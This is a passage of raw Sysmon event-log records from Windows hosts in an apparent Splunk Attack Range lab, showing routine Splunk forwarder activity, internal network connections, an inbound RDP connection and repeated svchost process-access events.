Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.205{5EBD8912-8A28-6151-237A-00000000FC01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.157{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1FC36EC8852971704702BB84DB00613,SHA256=F5395525406916804D068A1AD4B037CA149E7607DDEA846BBF266FC2138717D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:52.872{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59350-false10.0.1.12-8000- 23542300x8000000000000000978236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:57.774{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10397A3495A21F1CF3D06C249100D686,SHA256=D31DCBD4B7DF312FFAFE2E0EB8E027CDDD273BFD4ABD33031FFA5906BD357EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.172{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D330434925529FFB4DEC98C785876A66,SHA256=1165F4488FCD56886CEE19349D097F84291C69E70D31A2BA561CEEF7D3252BBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:58.961{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D515620B3072D33922919C610FDD50,SHA256=91DC8F5EE49ACBC823F9BBD9324126B473191E25DDC4F4AB4439D86C4666E387,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.899{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57496-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:56.865{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53319-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.587{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A542ACC3F2BBACD3321932C9E36B6F2,SHA256=654ACDA4476AD91DA25E5459393DF7B524CC8358FEF08B7347E531183C7FFEF0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 